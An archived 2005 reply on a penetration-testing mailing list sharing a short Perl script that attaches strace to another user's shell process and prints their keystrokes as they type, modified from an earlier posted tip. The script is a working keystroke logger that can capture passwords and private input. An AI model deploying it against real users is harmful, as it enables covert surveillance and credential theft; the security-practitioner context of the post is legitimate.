|
Penetration Testing
mailing list archives
Re: Keystroke logging with strace (no setup required)
From: rootsuid <rootsuid () gmail com>
Date: Tue, 12 Jul 2005 19:15:46 +0000
I didn't like going between terminals (even through screen).. so I
just changed the one line:
---
open (F, "tail -f $ARGV[0] |");
---- changes to
open (F, "strace -p $ARGV[0] 2>&1 |");
----
then you ./strace_clean.pl <PID>,
also, if you aren't familiar with perl, this script is waiting for
line returns (so it does work on other applications too, but you will
not see the text until the user hits enter, vim, etc)
--root
----- strace_clean-new.pl
#!/usr/bin/perl -w
#
# Monitoring a user's shellcommands by using strace and displaying and
cleaning up the read() syscalls
# Based on the tip posted to secfocus by Mark Lachniet, written by Tom
Van de Wiele.
#
# To be used on a logfile or in real-time (as fast as /usr/bin/script
logs to file that is) like this:
#
# # script /tmp/what_is_user_foo_doing.log
# Script started, file is /tmp/what_is_user_foo_doing.log
# # strace -p <PID of shell of user>
#
# Using a different terminal at the same time:
# # perl strace_clean.pl /tmp/what_is_user_doing.log
#
#
use strict; # hi Kris :)
my $char;
open (F, "strace -p $ARGV[0] 2>&1 |");
while (<F>) {
next if !/^read/;
next if /^$/;
if (/^read\(0,\s\"(.*)\".*/) {
$char = $1;
if ($char =~ /\\r/) {
print "\n";
}
elsif ($char =~ /\\177/) {
print "\b";
}
elsif ($char =~ /\\t/) {
print "<TAB>";
}
else {
print $char;
}
}
}
#EOF
 By Date 
By Thread
Current thread:
|
Intro
